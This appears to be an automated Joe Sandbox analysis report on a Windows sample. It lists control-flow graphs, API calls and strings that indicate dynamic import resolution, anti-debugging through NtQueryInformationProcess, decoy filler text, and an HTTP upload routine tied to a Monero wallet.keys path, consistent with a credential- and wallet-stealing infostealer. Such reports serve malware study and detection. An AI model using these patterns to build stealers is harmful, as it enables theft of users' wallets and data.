86f38 15932 989f0 2 API calls 15930->15932 15931 86f26 FreeLibrary 15931->15933 15932->15927 15933->15927 15933->15930 15933->15931 15935 86542 15934->15935 15937 86549 15935->15937 15954 98a10 GetProcessHeap RtlAllocateHeap 15935->15954 15937->15928 15938 86660 15937->15938 15943 8668f VirtualAlloc 15938->15943 15940 86730 15941 8673c 15940->15941 15942 86743 VirtualAlloc 15940->15942 15941->15923 15942->15941 15943->15940 15943->15941 15945 869c9 15944->15945 15949 869d5 15944->15949 15946 86a09 LoadLibraryA 15945->15946 15945->15949 15947 86a32 15946->15947 15946->15949 15953 86ae0 15947->15953 15955 98a10 GetProcessHeap RtlAllocateHeap 15947->15955 15949->15925 15950 86ba8 GetProcAddress 15950->15949 15950->15953 15951 989f0 2 API calls 15951->15953 15952 86a8b 15952->15949 15952->15951 15953->15949 15953->15950 15954->15937 15955->15952

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 99860-99874 call 99750 663 9987a-99a8e call 99780 GetProcAddress * 21 660->663 664 99a93-99af2 LoadLibraryA * 5 660->664 663->664 665 99b0d-99b14 664->665 666 99af4-99b08 GetProcAddress 664->666 669 99b46-99b4d 665->669 670 99b16-99b41 GetProcAddress * 2 665->670 666->665 671 99b68-99b6f 669->671 672 99b4f-99b63 GetProcAddress 669->672 670->669 673 99b89-99b90 671->673 674 99b71-99b84 GetProcAddress 671->674 672->671 675 99bc1-99bc2 673->675 676 99b92-99bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(77190000,00D017D0), ref: 000998A1
                                • GetProcAddress.KERNEL32(77190000,00D01650), ref: 000998BA
                                • GetProcAddress.KERNEL32(77190000,00D01770), ref: 000998D2
                                • GetProcAddress.KERNEL32(77190000,00D015A8), ref: 000998EA
                                • GetProcAddress.KERNEL32(77190000,00D016F8), ref: 00099903
                                • GetProcAddress.KERNEL32(77190000,00D08AF0), ref: 0009991B
                                • GetProcAddress.KERNEL32(77190000,00CF4FD0), ref: 00099933
                                • GetProcAddress.KERNEL32(77190000,00CF5110), ref: 0009994C
                                • GetProcAddress.KERNEL32(77190000,00D01788), ref: 00099964
                                • GetProcAddress.KERNEL32(77190000,00D01698), ref: 0009997C
                                • GetProcAddress.KERNEL32(77190000,00D01740), ref: 00099995
                                • GetProcAddress.KERNEL32(77190000,00D016C8), ref: 000999AD
                                • GetProcAddress.KERNEL32(77190000,00CF4F90), ref: 000999C5
                                • GetProcAddress.KERNEL32(77190000,00D016B0), ref: 000999DE
                                • GetProcAddress.KERNEL32(77190000,00D016E0), ref: 000999F6
                                • GetProcAddress.KERNEL32(77190000,00CF5010), ref: 00099A0E
                                • GetProcAddress.KERNEL32(77190000,00D017E8), ref: 00099A27
                                • GetProcAddress.KERNEL32(77190000,00D01500), ref: 00099A3F
                                • GetProcAddress.KERNEL32(77190000,00CF50F0), ref: 00099A57
                                • GetProcAddress.KERNEL32(77190000,00D015D8), ref: 00099A70
                                • GetProcAddress.KERNEL32(77190000,00CF5270), ref: 00099A88
                                • LoadLibraryA.KERNEL32(00D015F0,?,00096A00), ref: 00099A9A
                                • LoadLibraryA.KERNEL32(00D01518,?,00096A00), ref: 00099AAB
                                • LoadLibraryA.KERNEL32(00D01548,?,00096A00), ref: 00099ABD
                                • LoadLibraryA.KERNEL32(00D01590,?,00096A00), ref: 00099ACF
                                • LoadLibraryA.KERNEL32(00D01608,?,00096A00), ref: 00099AE0
                                • GetProcAddress.KERNEL32(76850000,00D01560), ref: 00099B02
                                • GetProcAddress.KERNEL32(77040000,00D01620), ref: 00099B23
                                • GetProcAddress.KERNEL32(77040000,00D01638), ref: 00099B3B
                                • GetProcAddress.KERNEL32(75A10000,00D08F80), ref: 00099B5D
                                • GetProcAddress.KERNEL32(75690000,00CF5130), ref: 00099B7E
                                • GetProcAddress.KERNEL32(776F0000,00D08B20), ref: 00099B9F
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00099BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00099BAA
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                • Instruction ID: 4ae76afd93712e136087656b7b6dff623fc217f17b7484b65a9884ef56c8b408
                                • Opcode Fuzzy Hash: 7baeb3013c8c4ad9874623f591cfdb7c2e4ba621dc22f3683db2fd1c92a4c573
                                • Instruction Fuzzy Hash: 73A1AEB55012889FC344EFA8FD8CE6AB7F9F74C309704861AE60AC7264D7399846CB56

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 845c0-84695 RtlAllocateHeap 781 846a0-846a6 764->781 782 846ac-8474a 781->782 783 8474f-847a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0008460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0008479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000845DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00084765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000846C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0008475A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 5e47cb601431c053e59ca8a0b17e8a17c8dbf87a6d91f932ea96763a938f9408
                                • Instruction ID: eee41650ef6be6f250626e8122ac4ae05a043f4fe348f634d03a467a385645c3
                                • Opcode Fuzzy Hash: 5e47cb601431c053e59ca8a0b17e8a17c8dbf87a6d91f932ea96763a938f9408
                                • Instruction Fuzzy Hash: C641F6606C66047EE63CBFE49C42DFF76566F47709F505289BE407A380CBF06B2045A6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 84880-84942 call 9a7a0 call 847b0 call 9a740 * 5 InternetOpenA StrCmpCA 816 8494b-8494f 801->816 817 84944 801->817 818 84ecb-84ef3 InternetCloseHandle call 9aad0 call 89ac0 816->818 819 84955-84acd call 98b60 call 9a920 call 9a8a0 call 9a800 * 2 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a920 call 9a8a0 call 9a800 * 2 InternetConnectA 816->819 817->816 828 84f32-84fa2 call 98990 * 2 call 9a7a0 call 9a800 * 8 818->828 829 84ef5-84f2d call 9a820 call 9a9b0 call 9a8a0 call 9a800 818->829 819->818 905 84ad3-84ad7 819->905 829->828 906 84ad9-84ae3 905->906 907 84ae5 905->907 908 84aef-84b22 HttpOpenRequestA 906->908 907->908 909 84b28-84e28 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a9b0 call 9a8a0 call 9a800 call 9a920 call 9a8a0 call 9a800 call 9a740 call 9a920 * 2 call 9a8a0 call 9a800 * 2 call 9aad0 lstrlen call 9aad0 * 2 lstrlen call 9aad0 HttpSendRequestA 908->909 910 84ebe-84ec5 InternetCloseHandle 908->910 1021 84e32-84e5c InternetReadFile 909->1021 910->818 1022 84e5e-84e65 1021->1022 1023 84e67-84eb9 InternetCloseHandle call 9a800 1021->1023 1022->1023 1024 84e69-84ea7 call 9a9b0 call 9a8a0 call 9a800 1022->1024 1023->910 1024->1021
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00084915
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 0008493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00084ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000A0DDB,00000000,?,?,00000000,?,",00000000,?,00D0F418), ref: 00084DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00084E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00084E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00084E49
                                • InternetCloseHandle.WININET(00000000), ref: 00084EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00084EC5
                                • HttpOpenRequestA.WININET(00000000,00D0F3A8,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00084B15
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • InternetCloseHandle.WININET(00000000), ref: 00084ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                • Instruction ID: 4c18cf2490dd39e7c8b13e000ce1ed5bf9e26f55d42465214fb459e36855241e
                                • Opcode Fuzzy Hash: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                • Instruction Fuzzy Hash: 5312CF71A20118AADF15EB90DC96FEEB379BF16300F504199B10676092EF702F49DFA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                • Instruction ID: a8bae039c7c2b01d4bbbdb59434ce0e10438c5f3eea8fc606210a8fa597c2efc
                                • Opcode Fuzzy Hash: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                • Instruction Fuzzy Hash: 19F04FB1944208EBCB10DF99ED4AFAEFBB8FB04715F10025AFA05A2680C77815048BA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                • Instruction ID: 416f94bce9d38f5526209010d0599e43a6356f42bdb776f5bc85f33f1fdb1f7f
                                • Opcode Fuzzy Hash: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                • Instruction Fuzzy Hash: F5D09E7490430CDBCB04EFE0ED8DADDBB78FB08715F101555D90562340EA315596CBA6

                                Control-flow Graph

                                • Executed
                                • Not Executed
